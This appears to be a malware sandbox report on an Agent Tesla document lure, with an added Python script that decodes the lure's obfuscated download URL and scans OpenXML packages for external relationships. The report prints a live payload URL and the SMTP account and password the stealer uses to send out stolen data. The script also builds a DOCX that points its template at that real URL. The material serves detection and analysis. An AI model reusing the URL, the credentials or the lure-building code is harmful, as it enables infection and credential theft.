General
Target: stocks.docx
Size: 10KB
Sample: 230418-hmaqksbg7w
MD5: 0f341a25ed45ee0c5a13c99ea7194081
SHA1: 91f808e6a287071eaf9c4634a3c24cef4f9e9e59
SHA256: f42dbc7d64913299d020364ed9c3278e9fab9a140688754bc96b869c03ad61af
SHA512: 2609da36fcb55ba3f87a297234648546d87627310c9b0ae14971be4b604018a0aa5eb8ecc128cce08a0cf0447ffa7e05edd901d2ffe1dcba702bfdf5a0082490
SSDEEP: 192:ScIMmtPGT7G/bIwXOVOOE8O5SEzBC4vNq6sM63gG:SPXuT+xXOVOS8hlqHL
Static task: static1
Behavioral task: behavioral1 (sample: stocks.docx, resource: win7-20230220-en)
Behavioral task: behavioral2 (sample: stocks.docx, resource: win10v2004-20230220-en)
Malware Config
Extracted (URL):
http://%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ZZZZ99999999ZZZZZZ99999999ZZZZZZZ55555Z5Z5Z55Z5Z5Z5ZZZZZZZ0LLLLLLLOOOOO0000000000LLLLL00000000000OOOLLLLLLL@3235043190/q/%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23.doc
Extracted (agenttesla):
Protocol: smtp
Host: us2.smtp.mailhostbox.com
Port: 587
Username: 002@frem-tr.com
Password: jCXzqcP1 daniel 3116
Email To: 002@frem-tr.com
Targets
Target: stocks.docx
- AgentTesla: Agent Tesla is a .NET-based remote access tool (RAT) and information stealer that exfiltrates harvested credentials over SMTP, FTP or HTTP; the SMTP account in the Malware Config section above is its exfiltration channel.
- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location (the DOCX package carries a relationship with TargetMode="External", which Word resolves when the document is opened; the extracted URL above, ending in .doc, is that external target)
- Executes dropped EXE
- Loads dropped DLL
- Uses the VBS compiler for execution (vbc.exe, the signed Visual Basic .NET compiler shipped with the .NET Framework, is used as the execution host for the payload)
- Accesses Microsoft Outlook profiles (stored mail-client credentials are one of Agent Tesla's harvest targets)
- Adds Run key to start application (registry Run-key persistence)
- Drops file in System32 directory
- Suspicious use of SetThreadContext (setting another process's thread context is the final step of process hollowing, consistent with the payload running inside vbc.exe)
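The following Python is an added example; it is not part of the sandbox report and not code from any tool the report names. It serves two parts of the page: the extracted URL in Malware Config, whose real host is hidden behind RFC 3986 userinfo (everything before the "@") and written as a bare decimal integer, and the "Abuses OpenXML format to download file from external location" signature, which corresponds to a relationship with TargetMode="External" in one of the package's .rels parts. The DOCX it scans is constructed inside the script (a minimal package with one attachedTemplate relationship, the remote-template layout); it is a stand-in, not the 10KB sample, and the relationship type used by the real sample is not stated on the page and is an assumption. Only EXTRACTED_URL is taken from the report.

```python
"""Added example (not from the sandbox report): decode the obfuscated host in
the extracted URL and find external relationships in an OpenXML package."""
import io
import ipaddress
import re
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import unquote, urlsplit
from xml.sax.saxutils import escape

# The URL extracted by the sandbox (copied from the Malware Config section).
EXTRACTED_URL = "http://%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ZZZZ99999999ZZZZZZ99999999ZZZZZZZ55555Z5Z5Z55Z5Z5Z5ZZZZZZZ0LLLLLLLOOOOO0000000000LLLLL00000000000OOOLLLLLLL@3235043190/q/%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23.doc"

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
# External relationship types Word resolves automatically on open. Hyperlinks
# are also External but only fire when clicked, so they are not listed here.
AUTO_FETCH_TYPES = {ATTACHED_TEMPLATE}


def decode_host(url: str) -> str:
    """Return the host that will actually be contacted. urlsplit() discards the
    userinfo before '@' just as a client would; a bare-integer host is a
    decimal IPv4 address, which inet_addr-style parsers accept."""
    host = urlsplit(url).hostname or ""
    if re.fullmatch(r"\d+", host):
        return str(ipaddress.IPv4Address(int(host)))
    return host


def decoy_filename(url: str) -> str:
    """Percent-decoded last path segment: the fetched file's name as Word sees it."""
    return unquote(urlsplit(url).path.rsplit("/", 1)[-1])


def build_docx_with_external_rel(url: str) -> bytes:
    """Constructed minimal package (NOT the sample) with one external
    attachedTemplate relationship, the layout used by remote-template lures.
    The non-.rels parts are placeholders; only the relationship matters here."""
    safe_url = escape(url, {'"': "&quot;"})
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{safe_url}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def find_external_relationships(docx_bytes: bytes) -> list:
    """Walk every *.rels part in the package and report relationships whose
    target lies outside the zip (TargetMode="External"), with the decoded
    host and whether Word fetches the target without user interaction."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "")
                found.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel_type.rsplit("/", 1)[-1],
                    "target": target,
                    "auto_fetch": rel_type in AUTO_FETCH_TYPES,
                    "host": decode_host(target),
                    "filename": decoy_filename(target),
                })
    return found


if __name__ == "__main__":
    sample = build_docx_with_external_rel(EXTRACTED_URL)
    for rel in find_external_relationships(sample):
        flag = " [fetched on open]" if rel["auto_fetch"] else ""
        print(f"{rel['part']}: {rel['type']} -> {rel['host']} ({rel['filename']}){flag}")
```

Scanning every .rels part rather than only word/_rels/document.xml.rels matters because the attachedTemplate relationship lives in word/_rels/settings.xml.rels; filtering on the relationship type separates auto-resolved targets from ordinary hyperlinks, which are also External. The host decode is the check to run before blocking or pivoting on an indicator: the long userinfo string is not the host, and the decimal integer is just an IPv4 address in another notation.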